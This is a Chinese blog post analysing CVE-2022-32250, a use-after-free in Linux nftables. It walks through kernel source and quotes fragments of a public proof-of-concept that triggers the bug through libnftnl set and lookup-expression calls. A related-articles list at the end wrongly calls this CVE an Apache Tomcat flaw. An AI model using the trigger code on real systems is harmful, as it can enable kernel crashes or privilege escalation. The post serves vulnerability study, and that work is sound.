CVE-2022-32250漏洞原理

最新推荐文章于 2024-06-06 09:50:52 发布
最新推荐文章于 2024-06-06 09:50:52 发布
阅读量1k 收藏 18
点赞数 36
文章标签: 数据库 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84434570/article/details/138518560
版权

CVE-2022-32250漏洞原理

原创 hope 蚁景网安 2024-05-06 20:00 湖南

前言

nftales中存在着集合(sets),用于存储唯一值的集合。sets 提供了高效地检查一个元素是否存在于集合中的机制,它可以用于各种网络过滤和转发规则。

CVE-2022-32250漏洞则是由于nftables在处理set时存在uaf的漏洞。

环境搭建

  • • ubuntu20 + QEMU-4.2.1 + Linux-5.15

  • • .config文件

    • • CONFIG_NF_TABLES=y

    • • CONFIG_NETFILTER_NETLINK=y

    • • CONFIG_E1000=y

    • • CONFIG_E1000E=y

    • • CONFIG_USER_NS=y,开启命名空间

  • • 开启KASANmake menuconfig --> Kernel hacking -->Memory Debugging --> KASAN

    图片

  • • 在ubuntu20直接安装的libnftnl版本太低,因此需要去https://www.netfilter.org/projects/libnftnl/index.html中下载./configure --prefix=/usr && make
    sudo make install

漏洞验证

poc:https://seclists.org/oss-sec/2022/q2/159

在运行poc时,KASAN检测出存在uaf漏洞

图片

 

漏洞原理

KASAN给出的信息可知,该漏洞与set有关,因此从set的创建到使用进行源码分析。

nf_tables_newset内首先需要校验集合名、所属的表、集合键值的长度以及集合的ID是否被设置,若这些条件不具备则直接返回。

File: linux-5.15\net\netfilter\nf_tables_api.c
4205: static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
4206:        const struct nlattr * const nla[])
4207: {
        ...
        //判断创建set的必备条件是否具备
4227:  if (nla[NFTA_SET_TABLE] == NULL ||
4228:      nla[NFTA_SET_NAME] == NULL ||
4229:      nla[NFTA_SET_KEY_LEN] == NULL ||
4230:      nla[NFTA_SET_ID] == NULL)
4231:   return -EINVAL;
        ...

集合通过kvzalloc函数开辟空间

File: linux-5.15\net\netfilter\nf_tables_api.c
    ...
4369:  set = kvzalloc(alloc_size, GFP_KERNEL);
4370:  if (!set)
4371:   return -ENOMEM;
    ...

在成功创建集合后,就会进行初始化的过程,有一个变量需要重点关注,即set->bindings

File: linux-5.15\net\netfilter\nf_tables_api.c
    ...
    //对集合做初始化
4390:  INIT_LIST_HEAD(&set->bindings);
4391:  INIT_LIST_HEAD(&set->catchall_list);
4392:  set->table = table;
4393:  write_pnet(&set->net, net);
4394:  set->ops = ops;
4395:  set->ktype = ktype;
4396:  set->klen = desc.klen;
4397:  set->dtype = dtype;
4398:  set->objtype = objtype;
4399:  set->dlen = desc.dlen;
4400:  set->flags = flags;
4401:  set->size = desc.size;
4402:  set->policy = policy;
4403:  set->udlen = udlen;
4404:  set->udata = udata;
4405:  set->timeout = timeout;
4406:  set->gc_int = gc_int;
    ...

图片

 

当初始化完毕之后,会去判断创建集合时,该集合是否有需要创建的表达式。

File: linux-5.15\net\netfilter\nf_tables_api.c
    ...
        //判断是否有表达式需要创建
4416:  if (nla[NFTA_SET_EXPR]) {
4417:   expr = nft_set_elem_expr_alloc(&ctx, set, nla[NFTA_SET_EXPR]); //表达式的创建
4418:   if (IS_ERR(expr)) {
4419:    err = PTR_ERR(expr);
4420:    goto err_set_expr_alloc;
4421:   }
4422:   set->exprs[0] = expr;
4423:   set->num_exprs++;
    ...

在代码[1]处会对表达式进行初始化,紧接着在代码[2]处会对表达式的标志位进行校验,当表达式的标志位不具备NFT_EXPR_STATEFUL属性,那么就会跳转到[3]中进行销毁表达式的处理,紧接着返回错误。这里似乎会存在问题,因为代表[1]与[2]是先创建表达式再检验,就会导致任意的表达式被创建。

File: linux-5.15\net\netfilter\nf_tables_api.c
5309: struct nft_expr *nft_set_elem_expr_alloc(const struct nft_ctx *ctx,
5310:       const struct nft_set *set,
5311:       const struct nlattr *attr)
5312: {
5313:  struct nft_expr *expr;
5314:  int err;
5315: 
5316:  expr = nft_expr_init(ctx, attr); --->[1]
5317:  if (IS_ERR(expr))
5318:   return expr;
5319: 
5320:  err = -EOPNOTSUPP;
5321:  if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL)) --->[2]
5322:   goto err_set_elem_expr;
5323: 
    ...
5334: err_set_elem_expr:
5335:  nft_expr_destroy(ctx, expr); --->[3]
5336:  return ERR_PTR(err);
5337: }

回顾KASAN的报告,发现该漏洞与表达式nft_lookup有关,因此接下来关注一下lookup表达式初始化的过程。

图片

image-20240302143631008

lookup表达式的结构体如下,可以看到在lookup结构体里存在着binding变量,是上面set会初始化的一个变量。

struct nft_lookup {
    struct nft_set   *set; //集合
    u8    sreg; //源寄存器
    u8    dreg; //目的寄存器
    bool    invert; 
    struct nft_set_binding  binding;
};

nft_set_bing结构体实则是维护了一个双链表。

struct nft_set_binding {
    struct list_head  list;
    const struct nft_chain  *chain;
    u32    flags;
};

nft_lookup_init函数负责初始化lookup表达式,可以看到需要set与源寄存器都存在的情况下才能够完成创建。

File: linux-5.15\net\netfilter\nft_lookup.c
095: static int nft_lookup_init(const struct nft_ctx *ctx,
096:       const struct nft_expr *expr,
097:       const struct nlattr * const tb[])
098: {
    ...
        //检测set与源寄存器的值
105:  if (tb[NFTA_LOOKUP_SET] == NULL ||
106:      tb[NFTA_LOOKUP_SREG] == NULL)
107:   return -EINVAL;
    ...

紧接着检索需要搜索的set

File: linux-5.15\net\netfilter\nft_lookup.c
        ...
109:  set = nft_set_lookup_global(ctx->net, ctx->table, tb[NFTA_LOOKUP_SET],
110:         tb[NFTA_LOOKUP_SET_ID], genmask);
111:  if (IS_ERR(set))
112:   return PTR_ERR(set);
        ...

最后在完成了set的搜索后,就会进行一个绑定操作,会将表达式的binging接入的setbinding

File: linux-5.15\net\netfilter\nft_lookup.c
    ...
148:  err = nf_tables_bind_set(ctx, set, &priv->binding);
149:  if (err < 0)
150:   return err;
    ...

首先在绑定之前会校验链表是否是匿名并且非空。

File: linux-5.15\net\netfilter\nf_tables_api.c
4606: int nf_tables_bind_set(const struct nft_ctx *ctx, struct nft_set *set,
4607:          struct nft_set_binding *binding)
4608: {
        ...
4615:  if (!list_empty(&set->bindings) && nft_set_is_anonymous(set))
4616:   return -EBUSY;
        ...

在通过上面的检测后,就会将当前表达式的加入到set中,

File: linux-5.15\net\netfilter\nf_tables_api.c
        ...
4643:  list_add_tail_rcu(&binding->list, &set->bindings);
        ...

综上所述,bing的作用实则是维护相同set下的不同的表达式。具体流程如下。

set创建时,会初始化bindings指向自己本身。

图片

 

紧接着若有lookup表达式创建,并绑定上述的set时,因此通过setbingdings,可以检索在当前set上的所有expr

图片

 

图片

 

在上面说过创建表达式的过程中会检测表达式的标志位是否为NFT_EXPR_STATEFUL,如[2]所示

5321:  if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL)) --->[2]
5322:   goto err_set_elem_expr;

在初始化lookup表达式时,是不会给flags设置值的,因此默认值即为0,因此在创建set的同时创建lookup表达式,lookup表达式的类型是默认为0,是无法绕过检测的。

struct nft_expr_type nft_lookup_type __read_mostly = {
    .name  = "lookup",
    .ops  = &nft_lookup_ops,
    .policy  = nft_lookup_policy,
    .maxattr = NFTA_LOOKUP_MAX,
    .owner  = THIS_MODULE,
};

那么就会进入销毁表达式[3]

5334: err_set_elem_expr:
5335:  nft_expr_destroy(ctx, expr); --->[3]
5336:  return ERR_PTR(err);

nft_expr_destory函数内除了是否表达式外还会调用nf_tables_expr_destroy函数

File: linux-5.15\net\netfilter\nf_tables_api.c
2823: void nft_expr_destroy(const struct nft_ctx *ctx, struct nft_expr *expr)
2824: {
2825:  nf_tables_expr_destroy(ctx, expr);
2826:  kfree(expr);
2827: }

nf_tables_exor_destroy函数会调用表达式的destroy操作

File: linux-5.15\net\netfilter\nf_tables_api.c
2761: static void nf_tables_expr_destroy(const struct nft_ctx *ctx,
2762:        struct nft_expr *expr)
2763: {
2764:  const struct nft_expr_type *type = expr->ops->type;
2765: 
2766:  if (expr->ops->destroy)
2767:   expr->ops->destroy(ctx, expr); //表达式的删除操作
2768:  module_put(type->owner);
2769: }

nft_lookup_destroy函数内部调用了nf_tables_destroy_set函数

File: linux-5.15\net\netfilter\nft_lookup.c
173: static void nft_lookup_destroy(const struct nft_ctx *ctx,
174:           const struct nft_expr *expr)
175: {
176:  struct nft_lookup *priv = nft_expr_priv(expr);
177: 
178:  nf_tables_destroy_set(ctx, priv->set);
179: }

nf_tables_destroy_set函数内部中有一个简单的判断,若不成立那么实际上nf_tables_destroy_set不会做任何操作。那么就会造成一个漏洞,若我们创建的表达式lookup已经被绑定在set上,因此list_empty(&set->bindings0,那么就会导致destroy操作不会执行任何操作。就会将lookup表达式残留在set->bingdings中。

File: linux-5.15\net\netfilter\nf_tables_api.c
4683: void nf_tables_destroy_set(const struct nft_ctx *ctx, struct nft_set *set)
4684: {
4685:  if (list_empty(&set->bindings) && nft_set_is_anonymous(set)) //判断`set->bingings是否为空,以及`set`是否匿名
4686:   nft_set_destroy(ctx, set);
4687: }

由于lookup->destory不会执行任何操作,就会导致lookup表达式仍然残留在set->bingdings上,但是由于表达式的标志位不能通过校验,随后该表达式就会被释放。

图片

 

图片

 

POC分析

首先创建一个名为set_stableset,为后续创建lookup表达式做准备。

    set_name = "set_stable";
    nftnl_set_set_str(set_stable, NFTNL_SET_TABLE, table_name);
    nftnl_set_set_str(set_stable, NFTNL_SET_NAME, set_name);
    nftnl_set_set_u32(set_stable, NFTNL_SET_KEY_LEN, 1);
    nftnl_set_set_u32(set_stable, NFTNL_SET_FAMILY, family);
    nftnl_set_set_u32(set_stable, NFTNL_SET_ID, set_id++);

紧接着创建名为set_triggerset,并同时将标志位设置为NFT_SET_EXPR,那么就能在创建set的同时创建表达式,创建的表达式为lookup表达式,并且搜索的set的名为set_stable,这里需要注意的是,第一个创建的set是为了后续的lookup表达式提供搜索的set,而第二次的set是为了创建set的同时创建lookup表达式,因此第二个set的作用仅仅是为了创建lookup表达式。

    set_name = "set_trigger";
    nftnl_set_set_str(set_trigger, NFTNL_SET_TABLE, table_name);
    nftnl_set_set_str(set_trigger, NFTNL_SET_NAME, set_name);
    nftnl_set_set_u32(set_trigger, NFTNL_SET_FLAGS, NFT_SET_EXPR);
    nftnl_set_set_u32(set_trigger, NFTNL_SET_KEY_LEN, 1);
    nftnl_set_set_u32(set_trigger, NFTNL_SET_FAMILY, family);
    nftnl_set_set_u32(set_trigger, NFTNL_SET_ID, set_id);
    exprs[exprid] = nftnl_expr_alloc("lookup");
    nftnl_expr_set_str(exprs[exprid], NFTNL_EXPR_LOOKUP_SET, "set_stable");
    nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_LOOKUP_SREG, NFT_REG_1);
    // nest the expression into the set
    nftnl_set_add_expr(set_trigger, exprs[exprid]);

最后就是触发漏洞,第三次的set同样的也仅仅是为了创建lookup表达式,由于此时名为set_stableset->bingdings还存在着被释放掉的lookup表达式的指针,因此在第三次创建的时候就会将新创建的lookup表达式链接到上述已经被释放的lookup表达式中,从而导致的uaf漏洞。

    set_name = "set_uaf";
    nftnl_set_set_str(set_uaf, NFTNL_SET_TABLE, table_name);
    nftnl_set_set_str(set_uaf, NFTNL_SET_NAME, set_name);
    nftnl_set_set_u32(set_uaf, NFTNL_SET_FLAGS, NFT_SET_EXPR);
    nftnl_set_set_u32(set_uaf, NFTNL_SET_KEY_LEN, 1);
    nftnl_set_set_u32(set_uaf, NFTNL_SET_FAMILY, family);
    nftnl_set_set_u32(set_uaf, NFTNL_SET_ID, set_id);
    exprs[exprid] = nftnl_expr_alloc("lookup");
    nftnl_expr_set_str(exprs[exprid], NFTNL_EXPR_LOOKUP_SET, "set_stable");
    nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_LOOKUP_SREG, NFT_REG_1);

参考链接

https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/

https://seclists.org/oss-sec/2022/q2/159

亿林网络股份
关注
  • 36
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2018-4193:CVE-2018-4193的漏洞利用
03-17
**CVE-2018-4193详解:...了解这个漏洞原理和利用方式,有助于我们更好地理解并应对类似的威胁。通过深入研究提供的压缩包文件"CVE-2018-4193-master",我们可以更详细地学习这个漏洞的细节和可能的解决方案。
CVE-2018-18778.docx
07-23
**漏洞原理** mini_httpd 是一款轻量级的HTTP服务器,其设计目标是提供一个简单易用的Web服务解决方案。然而,在其版本1.29中,该软件在处理HOST和FILE参数时存在逻辑错误。正常情况下,HOST参数应包含服务器域名,...
探秘 CVE-2022-32250:Linux 内核本地权限提升漏洞利用框架
最新发布
gitblog_00020的博客
06-06 366
探秘 CVE-2022-32250:Linux 内核本地权限提升漏洞利用框架 项目地址:https://gitcode.com/theori-io/CVE-2022-32250-exploit 在这个数字化的时代,安全无小事。特别是当涉及到操作系统级别的安全问题时,每一个漏洞都可能成为黑客的攻击入口。今天,我们为您带来了一个名为 CVE-2022-32250-Linux-Kernel-LPE 的开...
CVE-2022-32250 Exploit
gitblog_00001的博客
03-05 423
CVE-2022-32250 Exploit 项目简介 CVE-2022-32250是一款开源的漏洞利用工具,用于针对Apache Tomcat服务器中的一个远程代码执行漏洞CVE-2022-32250)进行攻击。 Apache Tomcat是一款广泛应用的Java应用服务器。在2022年4月,Apache官方发布了关于该漏洞安全公告,并提供了相应的补丁修复。然而,在某些情况下,由于部分用户的...
Nftables漏洞原理分析(CVE-2022-32250
蚁景网安学院
05-06 1013
在nftales中存在着集合(sets),用于存储唯一值的集合。sets 提供了高效地检查一个元素是否存在于集合中的机制,它可以用于各种网络过滤和转发规则。而CVE-2022-32250漏洞则是由于nftables在处理set时存在uaf的漏洞
漏洞修复-- Linux kernel 资源管理错误漏洞CVE-2022-32250
Q先生
11-15 1620
漏洞修复-- Linux kernel 资源管理错误漏洞CVE-2022-32250
【kernel exploit】CVE-2022-32250 nftables错误链表操作导致UAF写的漏洞利用
panhewu9919的博客
11-03 1483
`nftables` 模块的 `net/netfilter/nf_tables_api.c` 采用 `NFT_MSG_NEWSET` 功能来添加 `nft_set` 时,处理 `lookup` 和 `dynset` expression 时,由于错误的 `NFT_EXPR_STATEFUL` 检查,`nft_expr` 对象释放后仍位于`nft_set->binding` 链表中,新加入 `nft_expr` 时导致**UAF写**(触发漏洞需要 `CAP_NET_ADMIN` 权限)。UAF写会往 `km
[漏洞分析] CVE-2022-32250 netfilter UAF内核提权
Breeze的博客
10-24 1万+
分析CVE-2022-32250 漏洞触发原理以及利用技巧
CVE-2022-26923域权限提升漏洞复现
ordar123的博客
05-27 1087
本文首发于蛇矛实验室:https://mp.weixin.qq.com/s/AuPajld1K7N5alAkgMZNfA 环境搭建 域控 选择一台winserver2016搭建域控服务,这里是winserver2016。选择Active Directory 域服务,其他默认即可。 安装完成之后,提升为域控制器,开始配置域控。 添加新林rangenet.cn,其他默认,然后一步步到安装完成。 ADCS搭建 下面正式开始安装ADCS服务,只需要注意下面截图的内容,其他都是默认。 服务器管理器–>添
CVE-2022-23131——绕过 SAML SSO 身份验证
热门推荐
LiBai'S BLOG
02-19 7万+
漏洞描述 安全断言标记语言 (SAML) 是最常见的单点登录 (SSO) 标准之一。围绕 XML 实现,它允许身份提供者(IdP,一个能够对用户进行身份验证的实体)告诉服务提供者(SP,这里是 Zabbix)你是谁。您可以将Zabbix Web 前端配置为允许通过 SAML 进行用户身份验证,但默认情况下不启用它,因为它需要了解身份提供者的详细信息。这是企业部署最常见的设置。 在启用 SAML SSO 身份验证的实例上,它允许绕过身份验证并获得管理员权限。攻击者可以使用此访问权限在链接的Zabbix Ser
CVE-2022-0739详细记录
zsbgnw的博客
11-28 1242
CVE-2022-0739复现
解决OpenSSL "SSL-Death-Alert" 拒绝服务漏洞(CVE-2016-8610)安全漏洞,升级OpenSSL到OpenSSL 1.1.0k
10-25
最近放开了https服务,安全组扫描出新的漏洞,现对原OpenSSL 1.0.1g版本升级到OpenSSL 1.1.0k,同时重新编译OpenSSH及nginx,在此提供升级脚本,仅供参考
CVE-2022–26923漏洞分析
阿道夫的博客
01-31 1102
本次漏洞产生的主要原因是计算机账户关键属性的ACL设置问题和ADCS检查客户端身份不严格导致,结合之前的samAccountName欺骗漏洞,AD域中涉及身份认证标识的问题不止一次,微软在AD域中不用具有唯一性的自动编号字段SID而是其他字段作为身份认证标识在安全方面着实欠妥。本次漏洞利用简单,流量特征不明显难以检测,同时获取的AD域证书有效时间长,因此对于AD域的提权和权限维持都有很高的利用价值。一次,微软在AD域中不用具有唯一性的自动编号字段SID而是其他字段作为身份认证标识在安全方面着实欠妥。
Linux内核提权漏洞(CVE-2022-0847)复现
Hackerdoors
03-28 6046
## 0X01 漏洞描述 CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe” ## 0X02 影响范围 受影响版本 8 <= Linu
Cisco RV340命令执行漏洞CVE-2022-20707)及关联历史漏洞分析
C20220511的博客
05-18 1910
本篇文章主要是对Cisco RV340命令执行漏洞(CVE-2022-20707)进行的研究分析,尽管利用此漏洞需要身份验证,但可以通过CVE-2022-20705绕过现有的身份验证机制实现无条件的命令执行。历史相关的漏洞还包括:CVE-2020-3451、CVE-2021-1473、CVE-2021-1472,我们会逐一进行分析。
CVE-2022-32275 Grafana 8.4.3
PolarPeak的博客
06-07 543
转到登录页面并在登录参数上输入payload : /dashboard/snapshot/*?orgId=0%20/invite/:
cve-2022-22947漏洞原理
07-29
- *1* *2* [Spring Cloud Gateway RCE漏洞原理分析与复现(CVE-2022-22947)](https://blog.csdn.net/qq_49619863/article/details/127350543)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630",...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值